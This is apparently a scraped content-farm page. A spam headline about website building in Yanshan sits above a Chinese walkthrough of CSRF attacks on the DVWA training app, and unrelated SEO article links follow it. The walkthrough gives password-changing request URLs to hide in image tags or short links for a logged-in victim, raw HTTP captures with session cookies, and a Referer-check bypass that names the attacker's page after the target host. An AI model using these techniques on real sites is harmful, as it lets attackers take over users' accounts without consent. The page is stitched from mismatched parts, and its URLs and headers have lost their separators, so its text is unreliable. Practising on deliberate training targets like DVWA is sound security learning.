当前位置: 首页 > news >正文

盐山做网站是一种特色的网络营销方式

盐山做网站,是一种特色的网络营销方式,深圳平面设计公司排行榜,怎么做网站结构图CSRF 0x01 low 跨站#xff0c;输入密码和确认密码直接写在url中#xff0c;将连接分享给目标#xff0c;点击后修改密码 社工方式让目标点击短链接 伪造404页#xff0c;在图片中写路径为payload#xff0c;目标载入网页自动请求构造链接#xff0c;目标被攻击 http…CSRF 0x01 low 跨站输入密码和确认密码直接写在url中将连接分享给目标点击后修改密码 社工方式让目标点击短链接 伪造404页在图片中写路径为payload目标载入网页自动请求构造链接目标被攻击 http://dvt.dv/learndvwa/vulnerabilities/csrf/?password_new123password_conf123ChangeChange# 观察到url中的修改信息 目标的网站应当处于登录状态才可攻击成功 恶意网页如下尝试攻击 目标访问抓包观察 GET /att/tforc.html HTTP/1.1 Host: dvt.dv Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Cookie: securitymedium; PHPSESSID3ejpptkt8se4a8r4o5vftooj32 Connection: close 第一个包访问页面 GET /learndvwa/vulnerabilities/csrf/?password_newbbbpassword_confbbbChangeChange HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://dvt.dv/att/tforc.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Cookie: securitymedium; PHPSESSID3ejpptkt8se4a8r4o5vftooj32 Connection: close 第二个包请求img标签中的src值 目标的密码被修改利用成功 0x02 medium stripos( $_SERVER[ HTTP_REFERER ] ,$_SERVER[ SERVER_NAME ]) ! false 增加过滤检测请求头中的reffer请求头中的host由$_SERVER[‘SERVER_NAME’]获取。referer中出现host检测为来源自本host才能使用修改密码功能 在referer中出现host的值能通过。虑构造.html文件的文件名为利用网站的host这样能绕过检测。或将.html放在服务器中包含目标host值的目录中 Low级别的图片演示不妥我直接在网站下建个文件夹放恶意.html文件真实情况下这种条件不可能发生 演示命名文件名 GET /noSpecialFilderName/dvt.dv.html HTTP/1.1 Host: attack.at Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 If-None-Match: 11a-615565ab38c9e If-Modified-Since: Fri, 05 Apr 2024 09:48:13 GMT Connection: closeGET /learndvwa/vulnerabilities/csrf/?password_newfilepassword_conffileChangeChange HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://attack.at/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Connection: close 呵呵谷歌给referer作截断 手动修改 GET /learndvwa/vulnerabilities/csrf/?password_newfilepassword_conffileChangeChange HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://attack.at/noSpecialFilderName/dvt.dv.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Connection: close GET /learndvwa/login.php HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://attack.at/noSpecialFilderName/dvt.dv.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Connection: close 后面的包也改一下 不太成不知道为啥XD现代浏览器都不这么干了捏 尝试恶意host GET /learndvwa/vulnerabilities/csrf/?password_newattpassword_confattChangeChange HTTP/1.1 Host: dvt.dv User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svgxml,image/*,*/*;q0.8 Referer: http://hstnmdvt.dv/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q0.9,zh-CN;q0.8,zh;q0.7 Connection: close 这个包能改成 这个也能成
http://www.hkea.cn/news/14311942/

相关文章:

  • 北京网站平台建设公司南昌中小企业网站制作
  • 官方网站开发方案网站开发工具 售价
  • 北京便宜做网站视频剪辑线下培训班
  • 网站详情页链接怎么做wordpress 选择用户
  • 结构设计网站推荐企业所得税的计算公式三种
  • 如何查公司网站开发时间wordpress插件doc
  • 网站链接优化怎么做空间网架
  • 郑州logo设计公司泰州整站优化
  • 加强机关网站内容建设电商平台设计公司
  • 做企业网站的尺寸是多少免费开源网站系统有哪些
  • 毕设做网站答辩会要求当场演示吗网络建设包括哪些内容
  • 徐州泉山建设局网站上海中国建设银行招聘信息网站
  • 建设部造价工程师考试网站设计坞官网
  • 乡村旅游网站建设中国建设银行理财网站
  • 网站设计实例教程一个公司怎么做网站都放些什么
  • 甘肃建设厅网站二级建造师报名时间免费的舆情网站不需下载
  • 网站营销目标怎么看网站空间
  • 韩都衣舍网站建设方案全国企业信息公示(全国)
  • 怎么请人做网站家装用什么软件设计
  • 二级域名网站建设规范杭州网站推广方式
  • otc场外交易网站开发邯郸信息港邯郸信息网
  • 本地网站环境搭建施工企业质量管理体系应按照我国
  • 迅睿cms建站教程wordpress不同语言
  • 阜康市建设银行网站html后台网站模板
  • 长沙英文网站建设公司网站怎么做后台
  • 中山网站建设公司哪家好阿里云wordpress root
  • 青岛专业公司网站设计用iis制作简单网站
  • 佛山做企业网站的公司图书馆网页设计素材
  • 博罗惠州网站建设网站开发多钱
  • 昆明网站优化建设最好网页设计培训